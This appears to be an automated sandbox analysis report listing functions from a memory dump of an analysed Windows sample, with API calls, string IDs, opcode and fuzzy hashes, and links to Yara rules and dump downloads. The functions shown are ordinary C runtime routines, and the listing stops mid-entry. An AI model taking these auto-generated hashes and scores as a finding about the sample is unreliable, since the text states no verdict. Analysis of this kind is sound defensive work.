                                                                        • Part of subcall function 00007FF6148A0B08: GetLastError.KERNEL32(?,?,00000002,00007FF6148A0FAA,?,?,0000E117BC86E4D3,00007FF61489EF26,?,?,0000E117BC86E4D3,00007FF6148957A9), ref: 00007FF6148A0BB9
                                                                        • Part of subcall function 00007FF6148A0B08: LoadLibraryExW.KERNEL32(?,?,00000002,00007FF6148A0FAA,?,?,0000E117BC86E4D3,00007FF61489EF26,?,?,0000E117BC86E4D3,00007FF6148957A9), ref: 00007FF6148A0BFB
                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF6148A13B8
                                                                        • Part of subcall function 00007FF6148A0B08: FreeLibrary.KERNEL32(?,?,00000002,00007FF6148A0FAA,?,?,0000E117BC86E4D3,00007FF61489EF26,?,?,0000E117BC86E4D3,00007FF6148957A9), ref: 00007FF6148A0C34
                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF6148A13D7
                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF6148A13F6
                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF6148A1415
                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF6148A1434
                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF6148A1453
                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF6148A1472
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: try_get_function$Library$Load$AddressErrorFreeLastProc
                                                                      • String ID: AreFileApisANSI$CompareStringEx$EnumSystemLocalesEx$GetDateFormatEx$GetLocaleInfoEx$GetTimeFormatEx$GetUserDefaultLocaleName$IsValidLocaleName$LCIDToLocaleName$LCMapStringEx$LocaleNameToLCID
                                                                      • API String ID: 3255926029-3252031757
                                                                      • Opcode ID: ff26fa549664a9e6c3b543b250e110c73e0e93b052ee1395b2146854f55f0003
                                                                      • Instruction ID: 20d04dd002b49c330eedafa699030bf3df9f1a404a2e0813f893d6e2031664aa
                                                                      • Opcode Fuzzy Hash: ff26fa549664a9e6c3b543b250e110c73e0e93b052ee1395b2146854f55f0003
                                                                      • Instruction Fuzzy Hash: B33176A0908E47A8FAC5DF50ECD05E46321AF06B28FD08432D40DD36B58EBCE64AC3A0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF614888AE0, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 151COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: Concurrency::cancel_current_taskstd::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                      • String ID: bad locale name$false$true
                                                                      • API String ID: 4121308752-1062449267
                                                                      • Opcode ID: 2acc47f3ee5460246e562f599ce1c871837090b8d66bb40a8f3797986fa1f7c3
                                                                      • Instruction ID: 0a65d2f6009245eb698ecf3694154380457a9ee27b832b1ea2b33a0aa99e5d7f
                                                                      • Opcode Fuzzy Hash: 2acc47f3ee5460246e562f599ce1c871837090b8d66bb40a8f3797986fa1f7c3
                                                                      • Instruction Fuzzy Hash: F461C422A19F428AE791DF70E4902BC33A1EF82B18F444134DE4D97A99DF3CE455E300
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF614888D20, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 178COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Concurrency::cancel_current_taskLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                      • String ID: bad locale name$false$true
                                                                      • API String ID: 3230409043-1062449267
                                                                      • Opcode ID: 81bd60a1d7d5c08784e6758f3cc98d711b41acc909d01d1c7b7e009cefe83931
                                                                      • Instruction ID: f618db631bf64d6294648c5a59d18defeb0532ee4eb87ac97b2005ffb6aeb8aa
                                                                      • Opcode Fuzzy Hash: 81bd60a1d7d5c08784e6758f3cc98d711b41acc909d01d1c7b7e009cefe83931
                                                                      • Instruction Fuzzy Hash: 17819232A18F829AEB90DF30E4802ED37A0FF85B58F544135EA8D97A5ADF38D591D740
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF614890D0C, Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 317COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: BlockUnwind$CatchExecutionFrameHandler3::Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 910750162-393685449
                                                                      • Opcode ID: 0ad3f7242adc77171fa2c3354329154454959fcab71533e3599a90e7dc3b62df
                                                                      • Instruction ID: ee5e35b22034610f2d1b896dd728546870c90a6c15e9b0edf3d759c2aa0cb5dd
                                                                      • Opcode Fuzzy Hash: 0ad3f7242adc77171fa2c3354329154454959fcab71533e3599a90e7dc3b62df
                                                                      • Instruction Fuzzy Hash: C5D18472A08F4286FBA19F65D4802AD77A0FB86FA8F001135EE4D97B95DF39E591C700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF6148A41FC, Relevance: 10.8, APIs: 7, Instructions: 291COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      • Opcode ID: a72655217cf3ecb92df7e52be9117dae27c383bc9466b8c480e74d0a462121ca
                                                                      • Instruction ID: 00baf26d66a3ff4e54629c2d16991e3edf89b15abef6c1b0ac6ec5f91a898b2c
                                                                      • Opcode Fuzzy Hash: a72655217cf3ecb92df7e52be9117dae27c383bc9466b8c480e74d0a462121ca
                                                                      • Instruction Fuzzy Hash: 60C1D522A0DE8291EAA15F1990802BE7B91FF82FA4FA44131DA4D877E1CFFCE455C740
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF614882020, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 139COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$GetctypeGetwctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                      • String ID: bad locale name
                                                                      • API String ID: 1386471777-1405518554
                                                                      • Opcode ID: 901312fe49ec335b73383531d66f1a1410a0777c902f06001bd849fedde32a84
                                                                      • Instruction ID: 056194217978237e32b6791f93fe5f9513c1808ea79abb1d9deb4dbe17a9bbe2
                                                                      • Opcode Fuzzy Hash: 901312fe49ec335b73383531d66f1a1410a0777c902f06001bd849fedde32a84
                                                                      • Instruction Fuzzy Hash: 5E518A22F09F828AEB54DBB4D4802AC33B4AF96B54F444135DE4DA7A56DF38E566E300
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF614893568, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF614893816,?,?,?,00007FF614893514,?,?,?,?,00007FF6148901C5), ref: 00007FF6148935EB
                                                                      • GetLastError.KERNEL32(?,?,?,00007FF614893816,?,?,?,00007FF614893514,?,?,?,?,00007FF6148901C5), ref: 00007FF6148935F9
                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF614893816,?,?,?,00007FF614893514,?,?,?,?,00007FF6148901C5), ref: 00007FF614893623
                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF614893816,?,?,?,00007FF614893514,?,?,?,?,00007FF6148901C5), ref: 00007FF614893669
                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF614893816,?,?,?,00007FF614893514,?,?,?,?,00007FF6148901C5), ref: 00007FF614893675
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                      • String ID: api-ms-
                                                                      • API String ID: 2559590344-2084034818
                                                                      • Opcode ID: e28092d2a8754abe07b1813ff99e43b1423cfe1f6ef30b3aecc7f243d8151441
                                                                      • Instruction ID: b275d9a9da54f0717031b92d702e101c2e22938e7ac97e1d93673fee9c0ab3b4
                                                                      • Opcode Fuzzy Hash: e28092d2a8754abe07b1813ff99e43b1423cfe1f6ef30b3aecc7f243d8151441
                                                                      • Instruction Fuzzy Hash: C831F621B0AE4291EE92AB06D8846752394FF8EFB4F691534DE1D8B391EF3DE4409300
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF6148AD2B4, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                      • String ID: CONOUT$
                                                                      • API String ID: 3230265001-3130406586
                                                                      • Opcode ID: 3e7576745228368b001dc45455e94fee6e3588f672ca8818725641a55fdbca99
                                                                      • Instruction ID: ce6abc917466ca0ef1dddc6199117e3774c7bb8a00c6653aa04822762de29f4d
                                                                      • Opcode Fuzzy Hash: 3e7576745228368b001dc45455e94fee6e3588f672ca8818725641a55fdbca99
                                                                      • Instruction Fuzzy Hash: 9C11B131618E4186E3909B16E89436962A0FF8AFF4F144234EA1DC37E4DFBCD5558740
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF61488D438, Relevance: 9.2, APIs: 6, Instructions: 207COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: ByteCharMultiStringWide
                                                                      • String ID:
                                                                      • API String ID: 2829165498-0
                                                                      • Opcode ID: 13b951786706347ed30c3256fc5abe21f286629fc1ae3e690c436aa204d97c7e
                                                                      • Instruction ID: c0e7a8c3540408945d38150a63516799a304c9e163e1a05fce2808af0cd9cd0a
                                                                      • Opcode Fuzzy Hash: 13b951786706347ed30c3256fc5abe21f286629fc1ae3e690c436aa204d97c7e
                                                                      • Instruction Fuzzy Hash: 08818C32608F8286EBA09F11948037A76E1FB46FB8F540235EA5D97BD8DF7CE4068700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF614882EF0, Relevance: 9.2, APIs: 6, Instructions: 203COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                      • String ID:
                                                                      • API String ID: 459529453-0
                                                                      • Opcode ID: 7b156b3fef83c02c43ea01abf10932abe987a5502ca0c24b17b6cf8582936866
                                                                      • Instruction ID: ea15d2f6611bb85ea23b172682fed41d2a488bfa89cf4f5976170dac9eaaf1bd
                                                                      • Opcode Fuzzy Hash: 7b156b3fef83c02c43ea01abf10932abe987a5502ca0c24b17b6cf8582936866
                                                                      • Instruction Fuzzy Hash: 06916F36A09E8282EBA4DB15E5803A977A1FB86FA4F144136DE4E83B65CF3DE445D700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF614882C10, Relevance: 9.2, APIs: 6, Instructions: 193COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                      • String ID:
                                                                      • API String ID: 459529453-0
                                                                      • Opcode ID: 0c36f5b904ff30f730729e610fd2b9db094d15b04bf3cfd018bd2d334eecd3c9
                                                                      • Instruction ID: dba4bc4b2865538f29b91b22cb01a3f92d99dfb0634ef4a1af3bd425cb385a78
                                                                      • Opcode Fuzzy Hash: 0c36f5b904ff30f730729e610fd2b9db094d15b04bf3cfd018bd2d334eecd3c9
                                                                      • Instruction Fuzzy Hash: 6D814D36A09E8681EBA4DB15D5803B977A1FB86FA4F144132DE4E83BA9CF3DE445D700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF614887D90, Relevance: 9.1, APIs: 6, Instructions: 91COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                      • String ID:
                                                                      • API String ID: 2081738530-0
                                                                      • Opcode ID: 95c4d019e337df2d27c4ae43ed6a612003bc9bb314e5d3e30eeae33b3e725eca
                                                                      • Instruction ID: d29b34cc44b3b4248c438e8122120ca9960356f7edf0b6f6d97fd4ba9686cdfc
                                                                      • Opcode Fuzzy Hash: 95c4d019e337df2d27c4ae43ed6a612003bc9bb314e5d3e30eeae33b3e725eca
                                                                      • Instruction Fuzzy Hash: 8B314F32E09E4381EF94EB15E8C01A9B3B1FB96FA4B080631DA5E837A5DF3CE4519700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF6148881E0, Relevance: 9.1, APIs: 6, Instructions: 91COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                      • String ID:
                                                                      • API String ID: 2081738530-0
                                                                      • Opcode ID: e6b696b838180aeeb5d8db99cb0af4799342763c727a0bae7f89fe0791471731
                                                                      • Instruction ID: 5146fe0268e45f7e3d9271533ac601bbcbbbc3dc987c5fcacbe3810861e65622
                                                                      • Opcode Fuzzy Hash: e6b696b838180aeeb5d8db99cb0af4799342763c727a0bae7f89fe0791471731
                                                                      • Instruction Fuzzy Hash: 01314D32A19E4381EA95DB19F8C01A973A1FB96FA4F180231DA9E837A5DF3CE441D700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF614887250, Relevance: 9.1, APIs: 6, Instructions: 91COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                      • String ID:
                                                                      • API String ID: 2081738530-0
                                                                      • Opcode ID: 0d577c8873cb02b74a5d2540b211a9bb51c5b4332edea7e52b433389fe9cbf8c
                                                                      • Instruction ID: 877037f2b7ca5ab2afbc25410197b5937ca95a00daa213c4f42f6c784a1ae014
                                                                      • Opcode Fuzzy Hash: 0d577c8873cb02b74a5d2540b211a9bb51c5b4332edea7e52b433389fe9cbf8c
                                                                      • Instruction Fuzzy Hash: 2A317332A09E4381EB91EB19E8C01A97371FB95FA4F580631EA5E837A5DF3CE551D700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF614887C50, Relevance: 9.1, APIs: 6, Instructions: 91COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                      • String ID:
                                                                      • API String ID: 2081738530-0
                                                                      • Opcode ID: 67b6caa33580ea919a601df496601060b12e44cfd7252ea35e28455147dcd832
                                                                      • Instruction ID: edcc3a32a8a86811301b0584c73d0da6c939683ec9068ba2efdabc6b8134c019
                                                                      • Opcode Fuzzy Hash: 67b6caa33580ea919a601df496601060b12e44cfd7252ea35e28455147dcd832
                                                                      • Instruction Fuzzy Hash: 31310F32A09E4381EF95EB15E8C01B963B1FB95FB4B180632DA5E837A9DE2CE5519700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF61488A0C4, Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                      • String ID:
                                                                      • API String ID: 2081738530-0
                                                                      • Opcode ID: bedeafbaec8adbaae1230ad5c0c7c0810852a28c19c79fa022dfbe0f8d58771f
                                                                      • Instruction ID: 93250536e682863dff99d234972d7eeb4ddd06c4f13c26a4f2baf78bd7a77155
                                                                      • Opcode Fuzzy Hash: bedeafbaec8adbaae1230ad5c0c7c0810852a28c19c79fa022dfbe0f8d58771f
                                                                      • Instruction Fuzzy Hash: 07318E2AA09E4341EA959B19F8C00B9A365EF92FB4F180231DA5E837E5DF6CE441E300
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF61488B8FC, Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                      • String ID:
                                                                      • API String ID: 2081738530-0
                                                                      • Opcode ID: 014dc6ca548d231dec55e1923c3463b5928a751829b2780844626360de8ace3c
                                                                      • Instruction ID: e4a802571c055e3b4346a308cc0191f899a3ff42de94383a123264d10f6079bc
                                                                      • Opcode Fuzzy Hash: 014dc6ca548d231dec55e1923c3463b5928a751829b2780844626360de8ace3c
                                                                      • Instruction Fuzzy Hash: 3C318621A09E4741EE959B59E8C01B973A1EF96FB4F181231EB5D837A6DF3CE481D300
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF6148911E4, Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 325COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 3523768491-393685449
                                                                      • Opcode ID: 3ee202d90f6e6b7d6969c11b24808fbe1150c69e6f4b15407eb8d01be72417f8
                                                                      • Instruction ID: 53dfa5ca2927ef4684039571de9304bc3bcaee3e1d245f8f3647fedb173e2465
                                                                      • Opcode Fuzzy Hash: 3ee202d90f6e6b7d6969c11b24808fbe1150c69e6f4b15407eb8d01be72417f8
                                                                      • Instruction Fuzzy Hash: 61E1B273918F828AF7A19F65D4C02AD77A4FB86B68F140139DB8D87696CF39E581C700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF61488FFA8, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 152COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 2395640692-629598281
                                                                      • Opcode ID: 86a18549056dc6d76ac0abd78566524add973de1d0ba78654c8cdaa9775781b7
                                                                      • Instruction ID: 86965ddf976ccaf3d636d9d2f32cc452c172ae5fe4135c9aeafa00b57329c85d
                                                                      • Opcode Fuzzy Hash: 86a18549056dc6d76ac0abd78566524add973de1d0ba78654c8cdaa9775781b7
                                                                      • Instruction Fuzzy Hash: E151D172A19E5187E795DE15E484A393791FB87FE8F118130DE5E87788DF3AE8428700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF614881D10, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
